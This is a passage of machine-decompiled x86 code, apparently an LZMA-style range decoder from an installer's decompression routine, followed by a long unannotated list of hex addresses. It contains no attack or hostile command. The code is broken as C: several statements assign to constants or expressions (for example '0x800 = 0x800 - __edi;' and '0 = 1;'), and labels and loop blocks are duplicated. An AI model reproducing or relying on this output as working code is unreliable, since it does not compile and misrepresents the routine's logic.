													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                  0x00000000
                  0x00406a5d
                  0x00406a5d
                  0x00406a61
                  0x00406a82
                  0x00406a89
                  0x00406a8f
                  0x00406a95
                  0x00406aa7
                  0x00406aad
                  0x00406ab2
                  0x00000000
                  0x00406a63
                  0x00406a69
                  0x00406e2a
                  0x00406e2a
                  0x00406e2a
                  0x00406e2d
                  0x00406e2d
                  0x00406e2d
                  0x00406e33
                  0x00406e39
                  0x00406e3f
                  0x00406e59
                  0x00406e5c
                  0x00406e62
                  0x00406e6d
                  0x00406e6f
                  0x00406e41
                  0x00406e41
                  0x00406e50
                  0x00406e54
                  0x00406e54
                  0x00406e79
                  0x00000000
                  0x00000000
                  0x00406e7b
                  0x00406e7f
                  0x0040702e
                  0x00407044
                  0x0040704c
                  0x00407053
                  0x00407055
                  0x0040705c
                  0x00407060
                  0x00407060
                  0x00406e8b
                  0x00406e92
                  0x00406e9a
                  0x00406e9d
                  0x00406ea0
                  0x00406ea0
                  0x00406ea6
                  0x00406ea6
                  0x00406642
                  0x00406642
                  0x00406642
                  0x0040664b
                  0x00000000
                  0x00000000
                  0x00406651
                  0x00000000
                  0x0040665c
                  0x00000000
                  0x00000000
                  0x00406665
                  0x00406668
                  0x0040666b
                  0x0040666f
                  0x00000000
                  0x00000000
                  0x00406675
                  0x00406678
                  0x0040667a
                  0x0040667b
                  0x0040667e
                  0x00406680
                  0x00406681
                  0x00406683
                  0x00406686
                  0x0040668b
                  0x00406690
                  0x00406699
                  0x004066ac
                  0x004066af
                  0x004066bb
                  0x004066e3
                  0x004066e5
                  0x004066f3
                  0x004066f3
                  0x004066f7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004066e7
                  0x004066e7
                  0x004066ea
                  0x004066eb
                  0x004066eb
                  0x00000000
                  0x004066e7
                  0x004066c1
                  0x004066c6
                  0x004066c6
                  0x004066cf
                  0x004066d7
                  0x004066da
                  0x00000000
                  0x004066e0
                  0x004066e0
                  0x00000000
                  0x004066e0
                  0x00000000
                  0x004066fd
                  0x004066fd
                  0x00406701
                  0x00406fad
                  0x00000000
                  0x00406fad
                  0x0040670a
                  0x0040671a
                  0x0040671d
                  0x00406720
                  0x00406720
                  0x00406720
                  0x00406723
                  0x00406727
                  0x00000000
                  0x00000000
                  0x00406729
                  0x0040672f
                  0x00406759
                  0x0040675f
                  0x00406766
                  0x00000000
                  0x00406766
                  0x00406735
                  0x00406738
                  0x0040673d
                  0x0040673d
                  0x00406748
                  0x00406750
                  0x00406753
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406798
                  0x0040679e
                  0x004067a1
                  0x004067ae
                  0x004067b6
                  0x00000000
                  0x00000000
                  0x0040676d
                  0x0040676d
                  0x00406771
                  0x00406fbc
                  0x00000000
                  0x00406fbc
                  0x0040677d
                  0x00406788
                  0x00406788
                  0x00406788
                  0x0040678b
                  0x0040678e
                  0x00406791
                  0x00406796
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406e2d
                  0x00406e2d
                  0x00406e33
                  0x00406e39
                  0x00406e3f
                  0x00406e59
                  0x00406e5c
                  0x00406e62
                  0x00406e6d
                  0x00406e6f
                  0x00406e41
                  0x00406e41
                  0x00406e50
                  0x00406e54
                  0x00406e54
                  0x00406e79
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004067be
                  0x004067c0
                  0x004067c3
                  0x00406834
                  0x00406837
                  0x0040683a
                  0x00406841
                  0x0040684b
                  0x00406e2a
                  0x00406e2a
                  0x00000000
                  0x00406e2a
                  0x004067c5
                  0x004067c9
                  0x004067cc
                  0x004067ce
                  0x004067d1
                  0x004067d4
                  0x004067d6
                  0x004067d9
                  0x004067db
                  0x004067e0
                  0x004067e3
                  0x004067e6
                  0x004067ea
                  0x004067f1
                  0x004067f4
                  0x004067fb
                  0x004067ff
                  0x00406807
                  0x00406807
                  0x00406807
                  0x00406801
                  0x00406801
                  0x00406801
                  0x004067f6
                  0x004067f6
                  0x004067f6
                  0x0040680b
                  0x0040680e
                  0x0040682c
                  0x0040682e
                  0x00000000
                  0x00406810
                  0x00406810
                  0x00406813
                  0x00406816
                  0x00406819
                  0x0040681b
                  0x0040681b
                  0x0040681b
                  0x0040681e
                  0x00406821
                  0x00406823
                  0x00406824
                  0x00406827
                  0x00000000
                  0x00406827
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406ac7
                  0x00406acb
                  0x00406aee
                  0x00406af1
                  0x00406af4
                  0x00406afe
                  0x00406acd
                  0x00406acd
                  0x00406ad0
                  0x00406ad3
                  0x00406ad6
                  0x00406ae3
                  0x00406ae6
                  0x00406ae6
                  0x00406e2a
                  0x00406e2a
                  0x00406e2a
                  0x00000000
                  0x00406e2a
                  0x00000000
                  0x00406b0a
                  0x00406b0e
                  0x00000000
                  0x00000000
                  0x00406b14
                  0x00406b18
                  0x00000000
                  0x00000000
                  0x00406b1e
                  0x00406b20
                  0x00406b24
                  0x00406b24
                  0x00406b27
                  0x00406b2b
                  0x00000000
                  0x00000000
                  0x00406b7b
                  0x00406b7f
                  0x00406b86
                  0x00406b89
                  0x00406b8c
                  0x00406b96
                  0x00406e2a
                  0x00406e2a
                  0x00406e2a
                  0x00000000
                  0x00406e2a
                  0x00406e2a
                  0x00406b81
                  0x00000000
                  0x00000000
                  0x00406ba2
                  0x00406ba6
                  0x00406bad
                  0x00406bb0
                  0x00406bb3
                  0x00406ba8
                  0x00406ba8
                  0x00406ba8
                  0x00406bb6
                  0x00406bb9
                  0x00406bbc
                  0x00406bbc
                  0x00406bbf
                  0x00406bc2
                  0x00406bc5
                  0x00406bc5
                  0x00406bc8
                  0x00406bcf
                  0x00406bd4
                  0x00000000
                  0x00000000
                  0x00406c62
                  0x00406c62
                  0x00406c66
                  0x00407004
                  0x00000000
                  0x00407004
                  0x00406c6c
                  0x00406c6f
                  0x00406c72
                  0x00406c76
                  0x00406c79
                  0x00406c7f
                  0x00406c81
                  0x00406c81
                  0x00406c81
                  0x00406c84
                  0x00406c87
                  0x00000000
                  0x00000000
                  0x00406857
                  0x00406857
                  0x0040685b
                  0x00406fc8
                  0x00000000
                  0x00406fc8
                  0x00406861
                  0x00406864
                  0x00406867
                  0x0040686b
                  0x0040686e
                  0x00406874
                  0x00406876
                  0x00406876
                  0x00406876
                  0x00406879
                  0x0040687c
                  0x0040687c
                  0x0040687f
                  0x00406882
                  0x00000000
                  0x00000000
                  0x00406888
                  0x0040688e
                  0x00000000
                  0x00000000
                  0x00406894
                  0x00406894
                  0x00406898
                  0x0040689b
                  0x0040689e
                  0x004068a1
                  0x004068a4
                  0x004068a5
                  0x004068a8
                  0x004068aa
                  0x004068b0
                  0x004068b3
                  0x004068b6
                  0x004068b9
                  0x004068bc
                  0x004068bf
                  0x004068c2
                  0x004068de
                  0x004068e1
                  0x004068e4
                  0x004068e7
                  0x004068ee
                  0x004068f2
                  0x004068f4
                  0x004068f8
                  0x004068c4
                  0x004068c4
                  0x004068c8
                  0x004068d0
                  0x004068d5
                  0x004068d7
                  0x004068d9
                  0x004068d9
                  0x004068fb
                  0x00406902
                  0x00406905
                  0x00000000
                  0x0040690b
                  0x00000000
                  0x0040690b
                  0x00000000
                  0x00406910
                  0x00406910
                  0x00406914
                  0x00406fd4
                  0x00000000
                  0x00406fd4
                  0x0040691a
                  0x0040691d
                  0x00406920
                  0x00406924
                  0x00406927
                  0x0040692d
                  0x0040692f
                  0x0040692f
                  0x0040692f
                  0x00406932
                  0x00406935
                  0x00406935
                  0x00406935
                  0x0040693b
                  0x00000000
                  0x00000000
                  0x0040693d
                  0x00406940
                  0x00406943
                  0x00406946
                  0x00406949
                  0x0040694c
                  0x0040694f
                  0x00406952
                  0x00406955
                  0x00406958
                  0x0040695b
                  0x00406973
                  0x00406976
                  0x00406979
                  0x0040697c
                  0x0040697c
                  0x0040697f
                  0x00406983
                  0x00406985
                  0x0040695d
                  0x0040695d
                  0x00406965
                  0x0040696a
                  0x0040696c
                  0x0040696e
                  0x0040696e
                  0x00406988
                  0x0040698f
                  0x00406992
                  0x00000000
                  0x00406994
                  0x00000000
                  0x00406994
                  0x00406992
                  0x00406999
                  0x00406999
                  0x00406999
                  0x00406999
                  0x00000000
                  0x00000000
                  0x004069d4
                  0x004069d4
                  0x004069d8
                  0x00406fe0
                  0x00000000
                  0x00406fe0
                  0x004069de
                  0x004069e1
                  0x004069e4
                  0x004069e8
                  0x004069eb
                  0x004069f1
                  0x004069f3
                  0x004069f3
                  0x004069f3
                  0x004069f6
                  0x004069f9
                  0x004069f9
                  0x004069ff
                  0x0040699d
                  0x0040699d
                  0x004069a0
                  0x00000000
                  0x004069a0
                  0x00406a01
                  0x00406a01
                  0x00406a04
                  0x00406a07
                  0x00406a0a
                  0x00406a0d
                  0x00406a10
                  0x00406a13
                  0x00406a16
                  0x00406a19
                  0x00406a1c
                  0x00406a1f
                  0x00406a37
                  0x00406a3a
                  0x00406a3d
                  0x00406a40
                  0x00406a40
                  0x00406a43
                  0x00406a47
                  0x00406a49
                  0x00406a21
                  0x00406a21
                  0x00406a29
                  0x00406a2e
                  0x00406a30
                  0x00406a32
                  0x00406a32
                  0x00406a4c
                  0x00406a53
                  0x00406a56
                  0x00000000
                  0x00406a58
                  0x00000000
                  0x00406a58
                  0x00000000
                  0x00406ce5
                  0x00406ce5
                  0x00406ce9
                  0x00407010
                  0x00000000
                  0x00407010
                  0x00406cef
                  0x00406cf2
                  0x00406cf5
                  0x00406cf9
                  0x00406cfc
                  0x00406d02
                  0x00406d04
                  0x00406d04
                  0x00406d04
                  0x00406d07
                  0x00000000
                  0x00000000
                  0x00406ab5
                  0x00406ab5
                  0x00406ab8
                  0x00406e2a
                  0x00406e2a
                  0x00406e2a
                  0x00000000
                  0x00406e2a
                  0x00000000
                  0x00406df4
                  0x00406df8
                  0x00406e1a
                  0x00406e1d
                  0x00406e27
                  0x00406e2a
                  0x00406e2a
                  0x00406e2a
                  0x00000000
                  0x00406e2a
                  0x00406e2a
                  0x00406dfa
                  0x00406dfd
                  0x00406e01
                  0x00406e04
                  0x00406e04
                  0x00406e07
                  0x00000000
                  0x00000000
                  0x00406eb1
                  0x00406eb5
                  0x00406ed3
                  0x00406ed3
                  0x00406ed3
                  0x00406eda
                  0x00406ee1
                  0x00406ee8
                  0x00406ee8
                  0x00000000
                  0x00406ee8
                  0x00406eb7
                  0x00406eba
                  0x00406ebd
                  0x00406ec0
                  0x00406ec7
                  0x00406e0b
                  0x00406e0b
                  0x00406e0e
                  0x00000000
                  0x00000000
                  0x00406fa2
                  0x00406fa5
                  0x00406ea6
                  0x00000000
                  0x00000000
                  0x00406bdc
                  0x00406bde
                  0x00406be5
                  0x00406be6
                  0x00406be8
                  0x00406beb
                  0x00000000
                  0x00000000
                  0x00406bf3
                  0x00406bf6
                  0x00406bf9
                  0x00406bfb
                  0x00406bfd
                  0x00406bfd
                  0x00406bfe
                  0x00406c01
                  0x00406c08
                  0x00406c0b
                  0x00406c19
                  0x00000000
                  0x00000000
                  0x00406eef
